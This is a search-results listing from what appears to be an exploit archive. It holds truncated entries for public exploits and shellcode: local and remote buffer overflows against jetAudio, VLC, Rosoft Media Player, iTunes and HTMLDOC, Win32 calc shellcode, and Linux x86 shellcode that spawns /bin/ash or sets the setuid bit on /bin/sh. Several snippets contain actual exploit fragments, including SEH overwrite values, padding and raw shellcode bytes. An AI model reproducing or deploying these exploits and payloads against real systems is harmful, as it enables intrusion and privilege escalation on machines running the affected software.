7260 matches found
SOMPL Player Buffer Overflow
Exploit for unknown platform in category local exploits ============================ SOMPL Player Buffer Overflow ============================ Exploit Title : SOMPL Player Buffer Overflow Date : 20 January 2010 Author : Rick2600 Software Link :...
Win32 Shellcode XP SP2 FR (calc) 19 bytes
No description provided by source. view source print? / Author: SkuLL-HacKeR Big Thx To : my brothers : Pr0F.SELLiM - ThE X-HaCkEr - Jiko - My friends in Morocco H0ME : Geeksec.com & No-exploiT Email : [email protected] & [email protected] // Win32 Shellcode Collection calc 19 bytes // Shellcode...
jetAudio 8.0.0.2 Basic - .m3u Local Stack Overflow
jetAudio 8.0.0.2 Basic - .m3u Local Stack Overflow !/usr/bin/perl Title: jetAudio 8.0.0.2 Basic m3u Stack Overflow Exploit Author: cr4wl3r Tested: Windows xpsp2 my $file="b00m.m3u"; my $header = "http://"; my $junk = "A" x 1017; my $nseh = "\xeb\x06\x90\x90"; my $seh = pack'V',0x01221045; my...
jetAudio 8.0.0.2 Basic - '.m3u' Local Stack Overflow
!/usr/bin/perl Title: jetAudio 8.0.0.2 Basic m3u Stack Overflow Exploit Author: cr4wl3r Tested: Windows xpsp2 my $file="b00m.m3u"; my $header = "http://"; my $junk = "A" x 1017; my $nseh = "\xeb\x06\x90\x90"; my $seh = pack'V',0x01221045; my $shellcode =...
Win32 Shellcode XP SP2 FR calc 19 bytes
Win32 Shellcode XP SP2 FR calc 19 bytes. Shellcode exploit for win32 platform / Author: SkuLL-HacKeR Big Thx To : my brothers : Pr0F.SELLiM - ThE X-HaCkEr - Jiko - My friends in Morocco H0ME : Geeksec.com & No-exploiT Email : [email protected] & [email protected] // Win32 Shellcode Collection ca...
win32 Shellcode XP SP2 FR (calc) 19 bytes
Exploit for win32 platform in category shellcode ========================================= Win32 Shellcode XP SP2 FR calc 19 bytes ========================================= / Author: SkuLL-HacKeR // Win32 Shellcode Collection calc 19 bytes // Shellcode Exec Calc.exe // Tested on XP SP2 FR include...
VideoLAN VLC Media Player 0.8.6 abcd (Win32 Universal) - .ass Local Buffer Overflow
VideoLAN VLC Media Player 0.8.6 abcd Win32 Universal - .ass Local Buffer Overflow /%VLC vs 0.6.8 bcda .ASS file buffer overflow exploitwin32 universal %Works every time,works on any win32 OS,tested on Windows xp sp2. %My doctor said that I have seriuouse problems ,but I think he's full of it...
VideoLAN VLC Media Player 0.8.6 a/b/c/d (Win32 Universal) - '.ass' Local Buffer Overflow
/%VLC vs 0.6.8 bcda .ASS file buffer overflow exploitwin32 universal %Works every time,works on any win32 OS,tested on Windows xp sp2. %My doctor said that I have seriuouse problems ,but I think he's full of it because the voices tell me I'm ok!/ include include include define File...
Rosoft Media Player 4.4.4 Buffer OverFlow Exploit (SEH)
Exploit for unknown platform in category local exploits ======================================================= Rosoft Media Player 4.4.4 Buffer OverFlow Exploit SEH ======================================================= Exploit Title: Rosoft Media Player 4.4.4 Buffer OverFlow Exploit SEH Downlo...
MySql version 5.2 Change password length shell
Exploit for windows platform in category local exploits ============================================== MySql version 5.2 Change password length shell ============================================== I know I know it's been a while, I've been that much into xss and forget about the rest.. Mad respec...
Rosoft Media Player 4.4.4 - Local Buffer Overflow (SEH) (1)
Exploit Title: Rosoft Media Player 4.4.4 Buffer OverFlow Exploit SEH Download : http://download.cnet.com/3001-204-10044022.html?spi=02537eab7f440a326729a3dd1f7c6485 Date: 16/01/2010 Author: Red-D3v1L Special Thx For : H1s0k4 bEst 0verflower In ThE World xD sh0otz fly t0 :...
Apple iTunes 8.1.x - daap Remote Buffer Overflow
Apple iTunes 8.1.x - daap Remote Buffer Overflow / iTunes-CVE09-s36.c Apple iTunes 8.1.x daap Buffer overflow remote exploit CVE-2009-0950 Coded By : .:: Simo36 ::. Contact : [email protected] [email protected] Home : www.sec-r1z.com Tested on : Win XP SP/SP3 Frensh , Win2k pro SP4 english...
Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow
/ iTunes-CVE09-s36.c Apple iTunes 8.1.x daap Buffer overflow remote exploit CVE-2009-0950 Coded By : .:: Simo36 ::. Contact : [email protected] [email protected] Home : www.sec-r1z.com Tested on : Win XP SP/SP3 Frensh , Win2k pro SP4 english Thanks To : Ryujin & Stack & r1z finally I want ...
FDF Files Containing Timed JavaScript (CVE-2009-3956)
FDF is a file format used for representing form data and annotations that are contained in a PDF form. A remote attacker may exploit this issue to inject JavaScript into a PDF file from any domain on the internet. When Acrobat loads an FDF file, there is no check to ensure that the target file,...
HTMLDOC 1.9.x-r1629 local .html buffer overflow(win32) exploit
Exploit for unknown platform in category local exploits ============================================================== HTMLDOC 1.9.x-r1629 local .html buffer overflowwin32 exploit ============================================================== /HTMLDOC 1.9.x-r1629 local .html buffer overflowwin32...
HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow
/HTMLDOC 1.9.x-r1629 local .html buffer overflowwin32 exploit download: http://www.htmldoc.org/software.php?VERSION=1.9.x-r1629&FILE=htmldoc/snapshots/htmldoc-1.9.x-r1629.tar.bz2 header 19 bytes junk 268 bytes EIP register 4 bytes NOP SLEED 15 bytes calc.exe shellcode 338 bytes PLEASE READ: 1.Run...
YPOPs! v0.9.7.3 Buffer Overflow (SEH)
Exploit for unknown platform in category dos / poc ===================================== YPOPs! v0.9.7.3 Buffer Overflow SEH ===================================== Version:0.9.7.3 Tested on: Windows XP SP3 !/usr/bin/python All modules are SafeSEH protected in service pack 3. import socket, sys pri...
linux/x86 read(0 buf 2541)
No description provided by source. / readnchmod-core.c by Charles Stevenson [email protected] Example of strace output if you pass in "/bin/sh\x00" read0, "/bin/sh\0", 2541 = 8 chmod"/bin/sh", 04755 = 0 Any file path can be given. For example: /tmp/.sneakyguy The only caveat is that the string must...
linux/x86 execve(""/bin/ash"" 0 0)
No description provided by source. / 21 byte execve"/bin/ash",0,0; shellcode for linux x86 by zasta zasta at darkircop.org / include unistd.h include stdio.h char shellcode = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68" "\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80"; void code asm" xor %ecx,%ecx...
linux/x86 if(read(fd buf 512)<=2) _exit(1) else buf()
No description provided by source. / h3ll-core.c by Charles Stevenson [email protected] I made this as a chunk you can paste in to make modular remote exploits. I use it as a first stage payload when I desire to follow up with a real large payload of goodness. This actually is a bit larger than...